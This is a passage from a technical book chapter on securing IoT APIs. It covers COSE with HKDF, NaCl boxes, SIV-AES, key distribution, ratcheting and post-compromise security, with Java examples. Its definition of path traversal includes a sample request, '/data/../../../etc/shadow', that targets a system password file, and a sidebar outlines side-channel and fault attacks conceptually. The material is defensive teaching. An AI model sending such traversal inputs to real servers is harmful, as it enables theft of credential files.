like authenticated encryption algorithms, allowing the same key agreement and key
wrapping algorithms to be used to transmit a per-message MAC key.
In terms of algorithms, COSE supports many of the same algorithms as JOSE, and
adds additional algorithms that are more suited to constrained devices, such as AES-
CCM and ChaCha20-Poly1305 for authenticated encryption, and a truncated version of
HMAC-SHA-256 that produces a smaller 64-bit authentication tag. It also removes
some algorithms with perceived weaknesses, such as RSA with PKCS#1 v1.5 padding
and AES in CBC mode with a separate HMAC tag. Unfortunately, dropping support for
CBC mode means that all of the COSE authenticated encryption algorithms require
nonces that are too small to generate randomly. This is a problem, because when
implementing end-to-end encryption, there are no session keys or record sequence
numbers that can be used to safely implement a deterministic nonce.
Thankfully, COSE has a solution in the form of HKDF (hash-based key derivation
function) that you used in chapter 11. Rather than using a key to directly encrypt a
message, you can instead use the key along with a random nonce to derive a unique
key for every message. Because nonce reuse problems only occur if you reuse a
nonce with the same key, this reduces the risk of accidental nonce reuse consider-
ably, assuming that your devices have access to an adequate source of random data
(see section 12.3.2 if they don’t).
To demonstrate the use of COSE for encrypting messages, you can use the Java ref-
erence implementation from the COSE working group. Open the pom.xml file in
your editor and add the following lines to the dependencies section:7
7 The author of the reference implementation, Jim Schaad, also runs a winery named August Cellars in Oregon
if you are wondering about the domain name.
<dependency>
    <groupId>com.augustcellars.cose</groupId>
    <artifactId>cose-java</artifactId>
    <version>1.1.0</version>
</dependency>
Listing 12.13 shows an example of encrypting a message with COSE using HKDF to
derive a unique key for the message and AES-CCM with a 128-bit key for the message
encryption, which requires installing Bouncy Castle as a cryptography provider. For
this example, you can reuse the PSK from the examples in section 12.2.1. COSE
requires a Recipient object to be created for each recipient of a message and the
HKDF algorithm is specified at this level. This allows different key derivation or wrap-
ping algorithms to be used for different recipients of the same message, but in this
example, there’s only a single recipient. The algorithm is specified by adding an attri-
bute to the recipient object. You should add these attributes to the PROTECTED header
region, to ensure they are authenticated. The random nonce is also added to the
recipient object, as the HKDF_Context_PartyU_nonce attribute; I’ll explain the PartyU
part shortly. You then create an EncryptMessage object and set some content for the
message. Here I’ve used a simple string, but you can also pass any array of bytes.
Finally, you specify the content encryption algorithm as an attribute of the message (a
variant of AES-CCM in this case) and then encrypt it.
Listing 12.13 Encrypting a message with COSE HKDF

// Install Bouncy Castle to get AES-CCM support.
Security.addProvider(new BouncyCastleProvider());

// Load the key from the keystore.
var keyMaterial = PskServer.loadPsk("changeit".toCharArray());

// Encode the key as a COSE key object and add it to the recipient.
var recipient = new Recipient();
var keyData = CBORObject.NewMap()
        .Add(KeyKeys.KeyType.AsCBOR(), KeyKeys.KeyType_Octet)
        .Add(KeyKeys.Octet_K.AsCBOR(), keyMaterial);
recipient.SetKey(new OneKey(keyData));

// The KDF algorithm is specified as an attribute of the recipient.
recipient.addAttribute(HeaderKeys.Algorithm,
        AlgorithmID.HKDF_HMAC_SHA_256.AsCBOR(),
        Attribute.PROTECTED);

// The nonce is also set as an attribute on the recipient.
var nonce = new byte[16];
new SecureRandom().nextBytes(nonce);
recipient.addAttribute(HeaderKeys.HKDF_Context_PartyU_nonce,
        CBORObject.FromObject(nonce), Attribute.PROTECTED);

// Create the message and specify the content encryption algorithm.
var message = new EncryptMessage();
message.SetContent("Hello, World!");
message.addAttribute(HeaderKeys.Algorithm,
        AlgorithmID.AES_CCM_16_128_128.AsCBOR(),
        Attribute.PROTECTED);
message.addRecipient(recipient);

// Encrypt the message and output the encoded result.
message.encrypt();
System.out.println(Base64url.encode(message.EncodeToBytes()));
The HKDF algorithm in COSE supports specifying several fields in addition to the
PartyU nonce, as shown in table 12.4, which allows the derived key to be bound to sev-
eral attributes, ensuring that distinct keys are derived for different uses. Each attribute
can be set for either Party U or Party V, which are just arbitrary names for the partici-
pants in a communication protocol. In COSE, the convention is that the sender of a
message is Party U and the recipient is Party V. By simply swapping the Party U and
Party V roles around, you can ensure that distinct keys are derived for each direction
of communication, which provides a useful protection against reflection attacks. Each
party can contribute a nonce to the KDF, as well as identity information and any other
contextual information. For example, if your API can receive many different types of
requests, you could include the request type in the context to ensure that different
keys are used for different types of requests.
DEFINITION
A reflection attack occurs when an attacker intercepts a message
from Alice to Bob and replays that message back to Alice. If symmetric mes-
sage authentication is used, Alice may be unable to distinguish this from a
genuine message from Bob. Using distinct keys for messages from Alice to Bob and for messages from Bob to Alice prevents these attacks.
HKDF context fields can either be explicitly communicated as part of the message, or
they can be agreed on by parties ahead of time and be included in the KDF computa-
tion without being included in the message. If a random nonce is used, then this obvi-
ously needs to be included in the message; otherwise, the other party won’t be able to
guess it. Because the fields are included in the key derivation process, there is no need
to separately authenticate them as part of the message: any attempt to tamper with
them will cause an incorrect key to be derived. For this reason, you can put them in an
UNPROTECTED header which is not protected by a MAC.
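For example, to bind the derived key to both parties' identities, you could add the corresponding context attributes to the recipient from listing 12.13. This is a sketch: the identity strings are illustrative, and the attribute names follow the COSE reference implementation's HeaderKeys class:

recipient.addAttribute(HeaderKeys.HKDF_Context_PartyU_ID,
        CBORObject.FromObject("sensor-f5671434"),  // sender identity
        Attribute.PROTECTED);
recipient.addAttribute(HeaderKeys.HKDF_Context_PartyV_ID,
        CBORObject.FromObject("cloud-api"),        // recipient identity
        Attribute.PROTECTED);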
Table 12.4 COSE HKDF context fields

PartyU identity / PartyV identity
    An identifier for party U and V. This might be a username or domain name or some other application-specific identifier.

PartyU nonce / PartyV nonce
    Nonces contributed by either or both parties. These can be arbitrary random byte arrays or integers. Although these could be simple counters, it's best to generate them randomly in most cases.

PartyU other / PartyV other
    Any application-specific additional context information that should be included in the key derivation.

Although HKDF is designed for use with hash-based MACs, COSE also defines a variant of it that can use a MAC based on AES in CBC mode, known as HKDF-AES-MAC (this possibility was explicitly discussed in Appendix D of the original HKDF proposal; see https://eprint.iacr.org/2010/264.pdf). This eliminates the need for a hash function implementation, saving some code size on constrained devices. This can be particularly important on low-power devices because some secure element chips provide hardware support for AES (and even public key cryptography) but have no support for SHA-256 or other hash functions, requiring devices to fall back on slower and less efficient software implementations.
NOTE
You’ll recall from chapter 11 that HKDF consists of two functions: an
extract function that derives a master key from some input key material, and
an expand function that derives one or more new keys from the master key.
When used with a hash function, COSE’s HKDF performs both functions.
When used with AES it only performs the expand phase; this is fine because
the input key is already uniformly random as explained in chapter 11.8
In addition to symmetric authenticated encryption, COSE supports a range of public
key encryption and signature options, which are mostly very similar to JOSE, so I
won’t cover them in detail here. One public key algorithm in COSE that is worth high-
lighting in the context of IoT applications is support for elliptic curve Diffie-Hellman
(ECDH) with static keys for both the sender and receiver, known as ECDH-SS. Unlike
the ECDH-ES encryption scheme supported by JOSE, ECDH-SS provides sender
authentication, avoiding the need for a separate signature over the contents of each
message. The downside is that ECDH-SS always derives the same key for the same pair of
sender and receiver, and so can be vulnerable to replay attacks and reflection attacks,
and lacks any kind of forward secrecy. Nevertheless, when used with HKDF and mak-
ing use of the context fields in table 12.4 to bind derived keys to the context in which
they are used, ECDH-SS can be a very useful building block in IoT applications.
12.3.2 Alternatives to COSE
Although COSE is in many ways better designed than JOSE and is starting to see wide
adoption in standards such as FIDO 2 for hardware security keys (https://fidoalliance
.org/fido2/), it still suffers from the same problem of trying to do too much. It sup-
ports a wide variety of cryptographic algorithms, with varying security goals and quali-
ties. At the time of writing, I counted 61 algorithm variants registered in the COSE
algorithms registry (http://mng.bz/awDz), the vast majority of which are marked as
recommended. This desire to cover all bases can make it hard for developers to know
which algorithms to choose and while many of them are fine algorithms, they can lead
to security issues when misused, such as the accidental nonce reuse issues you’ve
learned about in the last few sections.
8 It’s unfortunate that COSE tries to handle both cases in a single class of algorithms. Requiring the expand
function for HKDF with a hash function is inefficient when the input is already uniformly random. On the
other hand, skipping it for AES is potentially insecure if the input is not uniformly random.
If you need standards-based interoperability with other software, COSE can be a fine choice for an IoT ecosystem, so long as you approach it with care. In many cases, however, interoperability is not a requirement because you control all of the software and devices being deployed. In this case, a simpler approach can be adopted, such as using
NaCl (the Networking and Cryptography Library; https://nacl.cr.yp.to) to encrypt
and authenticate a packet of data just as you did in chapter 6. You can still use CBOR
or another compact binary encoding for the data itself, but NaCl (or a rewrite of it,
like libsodium) takes care of choosing appropriate cryptographic algorithms, vetted
by genuine experts. Listing 12.14 shows how easy it is to encrypt a CBOR object using
NaCl’s SecretBox functionality (in this case through the pure Java Salty Coffee library
you used in chapter 6), which is roughly equivalent to the COSE example from the
previous section. First you load or generate the secret key, and then you encrypt your
CBOR data using that key.
Listing 12.14 Encrypting CBOR with NaCl

// Create or load a key.
var key = SecretBox.key();

// Generate some CBOR data.
var cborMap = CBORObject.NewMap()
        .Add("foo", "bar")
        .Add("data", 12345);

// Encrypt the data.
var box = SecretBox.encrypt(key, cborMap.EncodeToBytes());
System.out.println(box);
NaCl’s secret box is relatively well suited to IoT applications for several reasons:

- It uses a 192-bit per-message nonce, which minimizes the risk of accidental nonce reuse when using randomly generated values. This is the maximum size of nonce, so you can use a shorter value if you absolutely need to save space and pad it with zeroes before decrypting. Reducing the size increases the risk of accidental nonce reuse, so you should avoid reducing it to much less than 128 bits.
- The XSalsa20 cipher and Poly1305 MAC used by NaCl can be compactly implemented in software on a wide range of devices. They are particularly suited to 32-bit architectures, but there are also fast implementations for 8-bit microcontrollers. They therefore make a good choice on platforms without hardware AES support.
- The 128-bit authentication tag used by Poly1305 is a good trade-off between security and message expansion. Although stronger MAC algorithms exist, the authentication tag only needs to remain secure for the lifetime of the message (until it expires, for example), whereas the contents of the message may need to remain secret for a lot longer.

SHA-3 and STROBE

The US National Institute of Standards and Technology (NIST) recently completed an international competition to select the algorithm to become SHA-3, the successor to the widely used SHA-2 hash function family. To protect against possible future weaknesses in SHA-2, the winning algorithm (originally known as Keccak) was chosen partly because it is very different in structure to SHA-2. SHA-3 is based on an elegant and flexible cryptographic primitive known as a sponge construction. Although SHA-3 is relatively slow in software, it is well-suited to efficient hardware implementations. The Keccak team have subsequently implemented a wide variety of cryptographic primitives based on the same core sponge construction: other hash functions, MACs, and authenticated encryption algorithms. See https://keccak.team for more details.

Mike Hamburg’s STROBE framework (https://strobe.sourceforge.io) builds on top of the SHA-3 work to create a framework for cryptographic protocols for IoT applications. The design allows a single small core of code to provide a wide variety of cryptographic protections, making a compelling alternative to AES for constrained devices. If hardware support for the Keccak core functions becomes widely available, then frameworks like STROBE may become very attractive.
If your devices are capable of performing public key cryptography, then NaCl also
provides convenient and efficient public key authenticated encryption in the form of the
CryptoBox class, shown in listing 12.15. The CryptoBox algorithm works a lot like
COSE’s ECDH-SS algorithm in that it performs a static key agreement between the
two parties. Each party has their own key pair along with the public key of the other
party (see section 12.4 for a discussion of key distribution). To encrypt, you use your
own private key and the recipient’s public key, and to decrypt, the recipient uses their
private key and your public key. This shows that even public key cryptography is not
much more work when you use a well-designed library like NaCl.
WARNING
Unlike COSE’s HKDF, the key derivation performed in NaCl’s
crypto box doesn’t bind the derived key to any context material. You should
make sure that messages themselves contain the identities of the sender and
recipient and sufficient context to avoid reflection or replay attacks.
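One way to follow this advice is to put the identities inside the encrypted payload itself, for example (the field names here are illustrative):

var cborMap = CBORObject.NewMap()
        .Add("from", "device-123")       // sender identity
        .Add("to", "api.example.com")    // intended recipient
        .Add("data", 12345);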
Listing 12.15 Using NaCl's CryptoBox

// The sender and recipient each have a key pair.
var senderKeys = CryptoBox.keyPair();
var recipientKeys = CryptoBox.keyPair();

var cborMap = CBORObject.NewMap()
        .Add("foo", "bar")
        .Add("data", 12345);

// Encrypt using your private key and the recipient's public key.
var sent = CryptoBox.encrypt(senderKeys.getPrivate(),
        recipientKeys.getPublic(), cborMap.EncodeToBytes());

// The recipient decrypts with their private key and your public key.
var recvd = CryptoBox.fromString(sent.toString());
var cbor = recvd.decrypt(recipientKeys.getPrivate(),
        senderKeys.getPublic());
System.out.println(CBORObject.DecodeFromBytes(cbor));
12.3.3 Misuse-resistant authenticated encryption
Although NaCl and COSE can both be used in ways that minimize the risk of nonce
reuse, they only do so on the assumption that a device has access to some reliable
source of random data. This is not always the case for constrained devices, which
often lack access to good sources of entropy or even reliable clocks that could be
used for deterministic nonces. Pressure to reduce the size of messages may also
result in developers using nonces that are too small to be randomly generated safely.
An attacker may also be able to influence conditions to make nonce reuse more
likely, such as by tampering with the clock, or exploiting weaknesses in network pro-
tocols, as occurred in the KRACK attacks against WPA2 (https://www.krackattacks
.com). In the worst case, where a nonce is reused for many messages, the algorithms
in NaCl and COSE both fail catastrophically, enabling an attacker to recover a lot of
information about the encrypted data and in some cases to tamper with that data or
construct forgeries.
To avoid this problem, cryptographers have developed new modes of operation
for ciphers that are much more resistant to accidental or malicious nonce reuse.
These modes of operation achieve a security goal called misuse-resistant authenticated
encryption (MRAE). The most well-known such algorithm is SIV-AES, based on a
mode of operation known as Synthetic Initialization Vector (SIV; https://tools.ietf.org/
html/rfc5297). In normal use with unique nonces, SIV mode provides the same
guarantees as any other authenticated encryption cipher. But if a nonce is reused, a
MRAE mode doesn’t fail as catastrophically: an attacker could only tell if the exact
same message had been encrypted with the same key and nonce. No loss of authen-
ticity or integrity occurs at all. This makes SIV-AES and other MRAE modes much
safer to use in environments where it might be hard to guarantee unique nonces,
such as IoT devices.
DEFINITION
A cipher provides misuse-resistant authenticated encryption (MRAE)
if accidental or deliberate nonce reuse results in only a small loss of security.
An attacker can only learn if the same message has been encrypted twice with
the same nonce and key and there is no loss of authenticity. Synthetic Initializa-
tion Vector (SIV) mode is a well-known MRAE mode, and SIV-AES is the most common use of it.
SIV mode works by computing the nonce (also known as an Initialization Vector or
IV) using a pseudorandom function (PRF) rather than using a purely random value
or counter. Many MACs used for authentication are also PRFs, so SIV reuses the MAC
used for authentication to also provide the IV, as shown in figure 12.8.
CAUTION
Not all MACs are PRFs so you should stick to standard implementa-
tions of SIV mode rather than inventing your own.
The encryption process works by making two passes over the input:

1 First, a MAC is computed over the plaintext input and any associated data.9 The MAC tag is known as the Synthetic IV, or SIV.
2 Then the plaintext is encrypted using a different key, using the MAC tag from step 1 as the nonce.
The security properties of the MAC ensure that it is extremely unlikely that two differ-
ent messages will result in the same MAC tag, and so this ensures that the same nonce
is not reused with two different messages. The SIV is sent along with the message, just
as a normal MAC tag would be. Decryption works in reverse: first the ciphertext is
decrypted using the SIV, and then the correct MAC tag is computed and compared
with the SIV. If the tags don’t match, then the message is rejected.
WARNING
Because the authentication tag can only be validated after the mes-
sage has been decrypted, you should be careful not to process any decrypted
data before this crucial authentication step has completed.
In SIV-AES, the MAC is AES-CMAC, which is an improved version of the AES-CBC-MAC used in COSE. Encryption is performed using AES in CTR mode. This means that SIV-AES has the same nice property as AES-CCM: it requires only an AES encryption circuit for all operations (even decryption), so it can be compactly implemented.

9 The sharp-eyed among you may notice that this is a variation of the MAC-then-Encrypt scheme that we said in chapter 6 is not guaranteed to be secure. Although this is generally true, SIV mode has a proof of security so it is an exception to the rule.

[Figure 12.8 shows a message such as {"sensor": "abc123", "data": ...} being fed into AES-CMAC with the MAC key; the resulting authentication tag is used as the IV for AES-CTR encryption with the encryption key, producing the ciphertext. AES-SIV only needs an AES encryption circuit for all operations.]

Figure 12.8 SIV mode uses the MAC authentication tag as the IV for encryption. This ensures that the IV will only repeat if the message is identical, eliminating nonce reuse issues that can cause catastrophic security failures. SIV-AES is particularly suited to IoT environments because it only needs an AES encryption circuit to perform all operations (even decryption).
So far, the mode I’ve described will always produce the same nonce and the same ciphertext whenever the same plaintext message is encrypted. If you recall from chapter 6, such an encryption scheme is not secure because an attacker can easily tell if the same message has been sent multiple times. For example, if you have a sensor sending packets of data containing sensor readings in a small range of values, then an observer may be able to work out what the encrypted sensor readings are after seeing enough of them. This is why normal encryption modes add a unique nonce or random IV in every message: to ensure that different ciphertext is produced even if the same message is encrypted. SIV mode solves this problem by allowing you to include a random IV in the associated data that accompanies the message. Because this associated data is also included in the MAC calculation, it ensures that the calculated SIV will be different even if the message is the same. To make this a bit easier, SIV mode allows more than one associated data block to be provided to the cipher (up to 126 blocks in SIV-AES).

Side-channel and fault attacks

Although SIV mode protects against accidental or deliberate misuse of nonces, it doesn’t protect against all possible attacks in an IoT environment. When an attacker may have direct physical access to devices, especially where there is limited physical protection or surveillance, you may also need to consider other attacks. A secure element chip can provide some protection against tampering and attempts to read keys directly from memory, but keys and other secrets may also leak through many side channels. A side channel occurs when information about a secret can be deduced by measuring physical aspects of computations using that secret, such as the following:

- The timing of operations may reveal information about the key. Modern cryptographic implementations are designed to be constant time to avoid leaking information about the key in this way. Many software implementations of AES are not constant time, so alternative ciphers such as ChaCha20 are often preferred for this reason.
- The amount of power used by a device may vary depending on the value of secret data it is processing. Differential power analysis can be used to recover secret data by examining how much power is used when processing different inputs.
- Emissions produced during processing, including electromagnetic radiation, heat, or even sounds, have all been used to recover secret data from cryptographic computations.

As well as passively observing physical aspects of a device, an attacker may also directly interfere with a device in an attempt to recover secrets. In a fault attack, an attacker disrupts the normal functioning of a device in the hope that the faulty operation will reveal some information about secrets it is processing. For example, tweaking the power supply (known as a glitch) at a well-chosen moment might cause an algorithm to reuse a nonce, leaking information about messages or a private key. In some cases, deterministic algorithms such as SIV-AES can actually make fault attacks easier for an attacker.

Protecting against side-channel and fault attacks is well beyond the scope of this book. Cryptographic libraries and devices will document if they have been designed to resist these attacks. Products may be certified against standards such as FIPS 140-2 or Common Criteria, which both provide some assurance that the device will resist some physical attacks, but you need to read the fine print to determine exactly which threats have been tested.
Listing 12.16 shows an example of encrypting some data with SIV-AES in Java using
an open source library that implements the mode using AES primitives from Bouncy
Castle.10 To include the library, open the pom.xml file and add the following lines to
the dependencies section:
<dependency>
<groupId>org.cryptomator</groupId>
<artifactId>siv-mode</artifactId>
<version>1.3.2</version>
</dependency>
SIV mode requires two separate keys: one for the MAC and one for encryption and
decryption. The specification that defines SIV-AES (https://tools.ietf.org/html/rfc5297)
describes how a single key that is twice as long as normal can be split into two, with the
first half becoming the MAC key and the second half the encryption key. This is
demonstrated in listing 12.16 by splitting the existing 256-bit PSK key into two 128-bit
keys. You could also derive the two keys from a single master key using HKDF, as you
learned in chapter 11. The library used in the listing provides encrypt() and decrypt()
methods that take the encryption key, the MAC key, the plaintext (or ciphertext for
decryption), and then any number of associated data blocks. In this example, you’ll
pass in a header and a random IV. The SIV specification recommends that any ran-
dom IV should be included as the last associated data block.
TIP
The SivMode class from the library is thread-safe and designed to be
reused. If you use this library in production, you should create a single
instance of this class and reuse it for all calls.
Listing 12.16   Encrypting data with SIV-AES

// Load the key and split into separate MAC and encryption keys
var psk = PskServer.loadPsk("changeit".toCharArray());
var macKey = new SecretKeySpec(Arrays.copyOfRange(psk, 0, 16), "AES");
var encKey = new SecretKeySpec(Arrays.copyOfRange(psk, 16, 32), "AES");
// Generate a random IV with the best entropy you have available
var randomIv = new byte[16];
new SecureRandom().nextBytes(randomIv);
var header = "Test header".getBytes();
var body = CBORObject.NewMap()
        .Add("sensor", "F5671434")
        .Add("reading", 1234).EncodeToBytes();
var siv = new SivMode();
// Encrypt the body, passing the header and random IV as associated data
var ciphertext = siv.encrypt(encKey, macKey, body, header, randomIv);
// Decrypt by passing the same associated data blocks
var plaintext = siv.decrypt(encKey, macKey, ciphertext, header, randomIv);

10 At 4.5MB, Bouncy Castle doesn't qualify as a compact implementation, but it shows how SIV-AES can be easily implemented on the server.
Pop quiz

5 Misuse-resistant authenticated encryption (MRAE) modes of operation protect against which one of the following security failures?
a Overheating
b Nonce reuse
c Weak passwords
d Side-channel attacks
e Losing your secret keys

6 True or False: SIV-AES is just as secure even if you repeat a nonce.

The answers are at the end of the chapter.

12.4 Key distribution and management
In a normal API architecture, the problem of how keys are distributed to clients and
servers is solved using a public key infrastructure (PKI), as you learned in chapter 10.
To recap:
In this architecture, each device has its own private key and associated public key.
The public key is packaged into a certificate that is signed by a certificate author-
ity (CA) and each device has a permanent copy of the public key of the CA.
When a device connects to another device (or receives a connection), it pres-
ents its certificate to identify itself. The device authenticates with the associated
private key to prove that it is the rightful holder of this certificate.
The recipient can verify the identity of the other device by checking that its cer-
tificate is signed by the trusted CA and has not expired, been revoked, or in any
other way become invalid.
This architecture can also be used in IoT environments and is often used for more
capable devices. But constrained devices that lack the capacity for public key cryptog-
raphy are unable to make use of a PKI and so other alternatives must be used, based
on symmetric cryptography. Symmetric cryptography is efficient but requires the API
client and server to have access to the same key, which can be a challenge if there are
a large number of devices involved. The key distribution techniques described in the
next few sections aim to solve this problem.
12.4.1 One-off key provisioning
The simplest approach is to provide each device with a key at the time of device
manufacture or at a later stage when a batch of devices is initially acquired by an orga-
nization. One or more keys are generated securely and then permanently stored in
read-only memory (ROM) or EEPROM (electrically erasable programmable ROM)
on the device. The same keys are then encrypted and packaged along with device
identity information and stored in a central directory such as LDAP, where they can be
accessed by API servers to authenticate and decrypt requests from clients or to encrypt
responses to be sent to those devices. The architecture is shown in figure 12.9. A hard-
ware security module (HSM) can be used to securely store the master encryption keys
inside the factory to prevent compromise.
Figure 12.9 Unique device keys can be generated and installed on a device during
manufacturing. The device keys are then encrypted and stored along with device
details in an LDAP directory or database. APIs can later retrieve the encrypted device
keys and decrypt them to secure communications with that device.

An alternative to generating completely random keys during manufacturing is to
derive device-specific keys from a master key and some device-specific information.
For example, you can use HKDF from chapter 11 to derive a unique device-specific
key based on a unique serial number or ethernet hardware address assigned to each
device. The derived key is stored on the device as before, but the API server can derive
the key for each device without needing to store them all in a database. When the
device connects to the server, it authenticates by sending the unique information
(along with a timestamp or a random challenge to prevent replay), using its device key
to create a MAC. The server can then derive the same device key from the master
key and use this to verify the MAC. For example, Microsoft’s Azure IoT Hub Device
Provisioning Service uses a scheme similar to this for group enrollment of devices
using a symmetric key; for more information, see http://mng.bz/gg4l.
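For example, a minimal sketch of such a derivation, reusing the HKDF.expand() helper from chapter 11 (the "device-key-" label and the HMAC key type here are illustrative assumptions, not a fixed standard):

// Derive a device-specific key from the master key and the device's
// unique serial number
static Key deviceKey(Key masterKey, String serialNumber)
        throws GeneralSecurityException {
    return HKDF.expand(masterKey, "device-key-" + serialNumber, 32, "HMAC");
}

The server can call this method on demand for any device, so only the master key needs to be stored securely.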
12.4.2 Key distribution servers
Rather than installing a single key once when a device is first acquired, you can
instead periodically distribute keys to devices using a key distribution server. In this
model, the device uses its initial key to enroll with the key distribution server and then
is supplied with a new key that it can use for future communications. The key distribu-
tion server can also make this key available to API servers when they need to commu-
nicate with that device.
LEARN MORE
The E4 product from Teserakt (https://teserakt.io/e4/) includes
a key distribution server that can distribute encrypted keys to devices over the
MQTT messaging protocol. Teserakt has published a series of articles on the
design of its secure IoT architecture, designed by respected cryptographers,
at http://mng.bz/5pKz.
Once the initial enrollment process has completed, the key distribution server can
periodically supply a fresh key to the device, encrypted using the old key. This allows
the device to frequently change its keys without needing to generate them locally,
which is important because constrained devices are often severely limited in access to
sources of entropy.
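As a minimal sketch of the device side of this exchange, assuming the new key arrives as a serialized NaCl SecretBox encrypted under the old key (the message format and method name are illustrative; the decryption pattern mirrors the Device.getPsk() method used in chapter 13):

// Replace the current key with a new one sent by the key
// distribution server, encrypted under the old key
static Key handleKeyUpdate(Key currentKey, byte[] encryptedNewKey) {
    try (var in = new ByteArrayInputStream(encryptedNewKey)) {
        var box = SecretBox.readFrom(in);
        return new SecretKeySpec(box.decrypt(currentKey), "AES");
    } catch (IOException e) {
        throw new RuntimeException("Invalid key update message", e);
    }
}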
Remote attestation and trusted execution
Some devices may be equipped with secure hardware that can be used to establish
trust in a device when it is first connected to an organization’s network. For example,
the device might have a Trusted Platform Module (TPM), which is a type of hardware
security module (HSM) made popular by Microsoft. A TPM can prove to a remote
server that it is a particular model of device from a known manufacturer with a par-
ticular serial number, in a process known as remote attestation. Remote attestation
is achieved using a challenge-response protocol based on a private key, known as an
Endorsement Key (EK), that is burned into the device at manufacturing time. The TPM
uses the EK to sign an attestation statement indicating the make and model of the
device and can also provide details on the current state of the device and attached
hardware. Because these measurements of the device state are taken by firmware
running within the secure TPM, they provide strong evidence that the device hasn’t
been tampered with.
Although TPM attestation is strong, a TPM is not a cheap component to add to your
IoT devices. Some CPUs include support for a Trusted Execution Environment (TEE),
such as ARM TrustZone, which allows signed software to be run in a special secure
mode of execution, isolated from the normal operating system and other code.
Although less resistant to physical attacks than a TPM, a TEE can be used to
implement security critical functions such as remote attestation. A TEE can also be
used as a poor man's HSM, providing an additional layer of security over pure
software solutions.
Rather than writing a dedicated key distribution server, it is also possible to distribute
keys using an existing protocol such as OAuth2. A draft standard for OAuth2 (cur-
rently expired, but periodically revived by the OAuth working group) describes how
to distribute encrypted symmetric keys alongside an OAuth2 access token (http://
mng.bz/6AZy), and RFC 7800 describes how such a key can be encoded into a JSON
Web Token (https://tools.ietf.org/html/rfc7800#section-3.3). The same technique
can be used with CBOR Web Tokens (http://mng.bz/oRaM). These techniques allow
a device to be given a fresh key every time it gets an access token, and any API servers
it communicates with can retrieve the key in a standard way from the access token
itself or through token introspection. Use of OAuth2 in an IoT environment is dis-
cussed further in chapter 13.
12.4.3 Ratcheting for forward secrecy
If your IoT devices are sending confidential data in API requests, using the same
encryption key for the entire lifetime of the device can present a risk. If the device key
is compromised, then an attacker can not only decrypt any future communications
but also all previous messages sent by that device. To prevent this, you need to use
cryptographic mechanisms that provide forward secrecy as discussed in section 12.2.
In that section, we looked at public key mechanisms for achieving forward secrecy, but
you can also achieve this security goal using purely symmetric cryptography through a
technique known as ratcheting.
DEFINITION
Ratcheting in cryptography is a technique for replacing a symmet-
ric key periodically to ensure forward secrecy. The new key is derived from
the old key using a one-way function, known as a ratchet, because it only moves
in one direction. It’s impossible to derive an old key from the new key so pre-
vious conversations are secure even if the new key is compromised.
There are several ways to derive the new key from the old one. For example, you can
derive the new key using HKDF with a fixed context string as in the following example:
var newKey = HKDF.expand(oldKey, "iot-key-ratchet", 32, "HMAC");
TIP
It is best practice to use HKDF to derive two (or more) keys: one is used
for HKDF only, to derive the next ratchet key, while the other is used for
encryption or authentication. The ratchet key is sometimes called a chain key
or chaining key.
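A minimal sketch of that split, using the HKDF.expand() helper from chapter 11 (the labels are illustrative):

// Derive the next chain key, used only to continue the ratchet
var chainKey = HKDF.expand(oldChainKey, "iot-chain-key", 32, "HMAC");
// Derive a separate message key for encrypting messages in this period
var messageKey = HKDF.expand(oldChainKey, "iot-message-key", 32, "AES");

Because the two derivations use different labels, compromise of a message key does not reveal the chain key.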
If the key is not used for HMAC, but instead used for encryption using AES or another
algorithm, then you can reserve a particular nonce or IV value to be used for the
ratchet and derive the new key as the encryption of an all-zero message using that
reserved IV, as shown in listing 12.17 using AES in Counter mode. In this example, a
128-bit IV of all 1-bits is reserved for the ratchet operation because it is highly unlikely
that this value would be generated by either a counter or a randomly generated IV.
WARNING
You should ensure that the special IV used for the ratchet is never
used to encrypt a message.
Listing 12.17   Ratcheting with AES-CTR

private static byte[] ratchet(byte[] oldKey) throws Exception {
    var cipher = Cipher.getInstance("AES/CTR/NoPadding");
    // Reserve a fixed IV that is used only for ratcheting
    var iv = new byte[16];
    Arrays.fill(iv, (byte) 0xFF);
    // Initialize the cipher using the old key and the fixed ratchet IV
    cipher.init(Cipher.ENCRYPT_MODE,
            new SecretKeySpec(oldKey, "AES"),
            new IvParameterSpec(iv));
    // Encrypt 32 zero bytes and use the output as the new key
    return cipher.doFinal(new byte[32]);
}
After performing a ratchet, you should ensure the old key is scrubbed from memory
so that it can’t be recovered, as shown in the following example:
var newKey = ratchet(key);
Arrays.fill(key, (byte) 0);  // Overwrite the old key with zero bytes
key = newKey;                // Replace the old key with the new key
TIP
In Java and similar languages, the garbage collector may duplicate the
contents of variables in memory, so copies may remain even if you attempt to
wipe the data. You can use ByteBuffer.allocateDirect() to create off-heap
memory that is not managed by the garbage collector.
Ratcheting only works if both the client and the server can determine when a ratchet
occurs; otherwise, they will end up using different keys. You should therefore perform
ratchet operations at well-defined moments. For example, each device might ratchet
its key at midnight every day, or every hour, or perhaps even after every 10 messages.11
11 The Signal secure messaging service is famous for its "double ratchet" algorithm (https://signal.org/docs/specifications/doubleratchet/), which ensures that a fresh key is derived after every single message.
The rate at which ratchets should be performed depends on the number of requests
that the device sends, and the sensitivity of the data being transmitted.
Ratcheting after a fixed number of messages can help to detect compromise: if an
attacker is using a device’s stolen secret key, then the API server will receive extra mes-
sages in addition to any the device sent and so will perform the ratchet earlier than
the legitimate device. If the device discovers that the server is performing ratcheting
earlier than expected, then this is evidence that another party has compromised the
device secret key.
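For example, a minimal sketch of ratcheting after every 10 messages, reusing the ratchet() method from listing 12.17 (the counter bookkeeping shown here is an illustrative assumption):

private static final int RATCHET_INTERVAL = 10;
private int messageCount = 0;
private byte[] key; // the current encryption key

void afterMessage() throws Exception {
    if (++messageCount >= RATCHET_INTERVAL) {
        var newKey = ratchet(key);
        Arrays.fill(key, (byte) 0); // scrub the old key
        key = newKey;
        messageCount = 0;
    }
}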
12.4.4 Post-compromise security
Although forward secrecy protects old communications if a device is later compro-
mised, it says nothing about the security of future communications. There have been
many stories in the press in recent years of IoT devices being compromised, so being
able to recover security after a compromise is a useful security goal, known as post-
compromise security.
DEFINITION
Post-compromise security (or future secrecy) is achieved if a device can
ensure security of future communications after a device has been compro-
mised. It should not be confused with forward secrecy which protects confiden-
tiality of past communications.
Post-compromise security assumes that the compromise is not permanent, and in
most cases it’s not possible to retain security in the presence of a persistent compro-
mise. However, in some cases it may be possible to re-establish security once the com-
promise has ended. For example, a path traversal vulnerability might allow a remote
attacker to view the contents of files on a device, but not modify them. Once the vul-
nerability is found and patched, the attacker’s access is removed.
DEFINITION
A path traversal vulnerability occurs when a web server allows an
attacker to access files that were not intended to be made available by
manipulating the URL path in requests. For example, if the web server pub-
lishes data under a /data folder, an attacker might send a request for
/data/../../../etc/shadow.12 If the webserver doesn’t carefully check paths,
then it may serve up the local password file.
